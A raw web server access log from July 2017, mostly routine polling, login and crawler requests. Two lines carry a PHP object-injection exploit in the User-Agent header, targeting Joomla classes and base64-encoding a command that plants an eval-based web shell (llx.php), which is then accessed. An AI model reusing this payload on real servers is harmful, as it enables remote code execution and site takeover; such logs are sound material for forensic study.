89.16.198.102 - - [13/Jul/2017:16:18:35 +0200] "GET /reload?ser=1499955522111 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:19:26 +0200] "GET /reload?ser=1499955566277 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:19:36 +0200] "GET /reload?ser=1499955583080 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:20:27 +0200] "GET /reload?ser=1499955627374 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:20:37 +0200] "GET /reload?ser=1499955644357 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:21:28 +0200] "GET /reload?ser=1499955688515 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:21:38 +0200] "GET /reload?ser=1499955705424 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:22:29 +0200] "GET /reload?ser=1499955749693 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:22:39 +0200] "GET /reload?ser=1499955766581 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:23:30 +0200] "GET /reload?ser=1499955810848 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:24:04 +0200] "GET /reload?ser=1499955827703 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:24:32 +0200] "GET /reload?ser=1499955871995 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:25:05 +0200] "GET /reload?ser=1499955912925 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:25:33 +0200] "GET /reload?ser=1499955933148 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:26:07 +0200] "GET /reload?ser=1499955974015 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:26:34 +0200] "GET /reload?ser=1499955994309 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:27:08 +0200] "GET /reload?ser=1499956035368 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:27:35 +0200] "GET /reload?ser=1499956055468 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:28:13 +0200] "GET /reload?ser=1499956096460 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:28:36 +0200] "GET /reload?ser=1499956116602 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:29:14 +0200] "GET /reload?ser=1499956162076 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:29:37 +0200] "GET /reload?ser=1499956177765 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:30:16 +0200] "GET /reload?ser=1499956223172 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:30:38 +0200] "GET /reload?ser=1499956238928 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:31:17 +0200] "GET /reload?ser=1499956284317 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:31:40 +0200] "GET /reload?ser=1499956300092 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:32:18 +0200] "GET /reload?ser=1499956345374 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:32:41 +0200] "GET /reload?ser=1499956361269 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:33:19 +0200] "GET /reload?ser=1499956406614 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
193.194.132.73 - - [13/Jul/2017:16:33:42 +0200] "GET /reload?ser=1499956422456 HTTP/1.1" 200 28 "http://renault.2web.at/11569365" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.16.198.102 - - [13/Jul/2017:16:34:23 +0200] "GET /reload?ser=1499956467712 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
89.16.198.102 - - [13/Jul/2017:16:35:24 +0200] "GET /reload?ser=1499956531860 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
89.16.198.102 - - [13/Jul/2017:16:36:25 +0200] "GET /reload?ser=1499956593004 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
89.16.198.102 - - [13/Jul/2017:16:37:27 +0200] "GET /reload?ser=1499956654083 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
89.16.198.102 - - [13/Jul/2017:16:38:28 +0200] "GET /reload?ser=1499956715346 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
89.16.198.102 - - [13/Jul/2017:16:39:44 +0200] "GET /reload?ser=1499956776477 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
89.16.198.102 - - [13/Jul/2017:16:40:45 +0200] "GET /reload?ser=1499956852437 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
89.16.198.102 - - [13/Jul/2017:16:41:46 +0200] "GET /reload?ser=1499956913542 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
89.16.198.102 - - [13/Jul/2017:16:42:47 +0200] "GET /reload?ser=1499956974610 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
89.16.198.102 - - [13/Jul/2017:16:43:48 +0200] "GET /reload?ser=1499957035676 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
89.16.198.102 - - [13/Jul/2017:16:44:49 +0200] "GET /reload?ser=1499957096975 HTTP/1.1" 200 28 "http://renault.activities.at/success" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
88.116.177.83 - - [13/Jul/2017:17:03:26 +0200] "GET /10201637 HTTP/1.1" 302 150 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)"
88.116.177.83 - - [13/Jul/2017:17:03:28 +0200] "GET /login?required=true HTTP/1.1" 200 2086 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)"
88.116.177.83 - - [13/Jul/2017:17:03:29 +0200] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 200 1559 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:31 +0200] "GET /apple-touch-icon.png HTTP/1.1" 200 1559 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:32 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:32 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:32 +0200] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 200 1559 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:33 +0200] "GET /apple-touch-icon.png HTTP/1.1" 200 1559 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:34 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:34 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:34 +0200] "GET /10201637 HTTP/1.1" 302 150 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1"
88.116.177.83 - - [13/Jul/2017:17:03:35 +0200] "GET /login?required=true HTTP/1.1" 200 2086 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1"
88.116.177.83 - - [13/Jul/2017:17:03:36 +0200] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 200 1559 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:37 +0200] "GET /apple-touch-icon.png HTTP/1.1" 200 1559 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:38 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:38 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:38 +0200] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 200 1559 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:39 +0200] "GET /apple-touch-icon.png HTTP/1.1" 200 1559 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:40 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
88.116.177.83 - - [13/Jul/2017:17:03:40 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)"
192.151.148.50 - - [13/Jul/2017:18:06:58 +0200] "GET / HTTP/1.1" 200 15731 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:216:\"eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xseC5waHAnLCc4RDlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbInhpYW9iYWlmayJdKTsnKTs));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
192.151.148.50 - - [13/Jul/2017:18:07:00 +0200] "GET / HTTP/1.1" 200 15731 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:216:\"eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xseC5waHAnLCc4RDlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbInhpYW9iYWlmayJdKTsnKTs));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
69.197.139.130 - - [13/Jul/2017:18:07:01 +0200] "GET /llx.php HTTP/1.1" 200 5660 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
207.46.13.76 - - [13/Jul/2017:21:09:45 +0200] "GET /robots.txt HTTP/1.1" 404 300 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.189 - - [13/Jul/2017:21:10:03 +0200] "GET /login?required=true HTTP/1.1" 200 2086 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.28 - - [13/Jul/2017:21:16:01 +0200] "GET /robots.txt HTTP/1.1" 404 300 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.28 - - [13/Jul/2017:21:16:06 +0200] "GET /css/styles.css HTTP/1.1" 200 14664 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.139 - - [13/Jul/2017:21:16:11 +0200] "GET /css/clears.css HTTP/1.1" 200 851 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.139 - - [13/Jul/2017:21:16:11 +0200] "GET /css/prototip.css HTTP/1.1" 200 968 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.139 - - [13/Jul/2017:21:16:12 +0200] "GET /css/reset.css HTTP/1.1" 200 1356 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.139 - - [13/Jul/2017:21:16:12 +0200] "GET /css/themes/alphacube.css HTTP/1.1" 200 743 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.139 - - [13/Jul/2017:21:16:12 +0200] "GET /js/checkout.css HTTP/1.1" 200 359 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.139 - - [13/Jul/2017:21:16:13 +0200] "GET /js/index.php?c=auto&f=,prototype/prototype.js,prototype/validation.js,scriptaculous/builder.js,scriptaculous/effects.js,scriptaculous/dragdrop.js,scriptaculous/controls.js,scriptaculous/slider.js,varien/js.js,varien/form.js,varien/menu.js,mage/translate.js,mage/cookies.js,varien/product.js,spinner/SpinnerControl.jsmin.js,prototype/window.js,prototype/window_ext.js HTTP/1.1" 200 94182 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.189 - - [13/Jul/2017:21:16:17 +0200] "GET /css/print.css HTTP/1.1" 200 543 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.189 - - [13/Jul/2017:21:16:17 +0200] "GET /css/themes/default.css HTTP/1.1" 200 769 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.189 - - [13/Jul/2017:21:16:18 +0200] "GET /js/default.js HTTP/1.1" 200 14698 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.189 - - [13/Jul/2017:21:16:19 +0200] "GET /loadthumbnail.php?id=11127982 HTTP/1.1" 200 399614 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.139 - - [13/Jul/2017:23:03:48 +0200] "GET /layout.php HTTP/1.1" 200 1559 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
46.125.250.67 - - [13/Jul/2017:23:05:06 +0200] "GET / HTTP/1.1" 200 4000 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1"
46.125.250.67 - - [13/Jul/2017:23:05:08 +0200] "GET /apple-touch-icon-120x120-precomposed.png HTTP/1.1" 200 1559 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:09 +0200] "GET /apple-touch-icon-120x120.png HTTP/1.1" 200 1559 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:10 +0200] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 200 1559 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:11 +0200] "GET /apple-touch-icon.png HTTP/1.1" 200 1559 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:12 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:12 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:13 +0200] "GET /favicon.ico HTTP/1.1" 304 - "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:13 +0200] "GET /apple-touch-icon-120x120-precomposed.png HTTP/1.1" 200 1559 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:14 +0200] "GET /apple-touch-icon-120x120.png HTTP/1.1" 200 1559 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:15 +0200] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 200 1559 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:16 +0200] "GET /apple-touch-icon.png HTTP/1.1" 200 1559 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:17 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:17 +0200] "GET /images/favicon.ico HTTP/1.1" 404 305 "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"
46.125.250.67 - - [13/Jul/2017:23:05:17 +0200] "GET /favicon.ico HTTP/1.1" 304 - "-" "MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0"